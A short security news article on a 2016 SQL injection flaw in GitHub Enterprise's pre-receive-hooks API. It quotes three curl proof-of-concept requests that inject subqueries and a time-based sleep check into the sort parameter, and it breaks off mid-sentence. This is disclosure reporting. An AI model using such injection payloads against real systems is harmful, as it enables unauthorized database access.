Have Yourself a Merry Little Vulnerability

SQL injection attacks against applications are on the rise with large enterprises and global corporations being the main target. As we have seen time and again even software from reliable vendors can have vulnerabilities that open way for malicious users to compromise the security of an application. Here is another example.

The end of 2016 was marked with the new GitHub Enterprise vulnerability discovered. GitHub.com is a web-based hosting service, which uses Git – an open source distributed version control system. GitHub Enterprise is the on-premises version of GitHub packaged for running on an organization’s local network. The found vulnerability enabled malicious users to inject SQL commands into SQL statements through sending a specific request.

GitHub Enterprise is delivered as a virtual appliance with 45-day free trial licenses available. It shares a code-base with GitHub.com. The source code is kept private and during installation it is retrieved in transparent mode. After de-obfuscating the code the researcher found out that the code was mostly written in Ruby with Python, C++, Bourne Shell and Java components being used. After accessing the code it took him only four days to analyze potential problems and find a SQL Injection vulnerability under GitHub Enterprise PreReceiveHookTarget model. The malicious payload could be injected into the sort parameter when sending a query to access API.

$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=???????? &sort=id,(select+1+from+information_schema.tables+limit+1,1)'
$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=???????? &sort=id,(select+1+from+mysql.user+limit+1,1)' { "message": "Server Error", "documentation_url": "https://developer.github.com/enterprise/2.8/v3/orgs/pre_receive_hooks" }
$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \ 'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=???????? &sort=id,if(user()="github@localhost",sleep(5),user())

GitHub was informed about the vulnerability in December and fixed the problem in GitHub Enterprise 2.8.5 release. The researcher who spotted the bug received $ 5,000 reward. GitHub bug bounty program was launched three years ago. During this time more than 100 software security researchers wer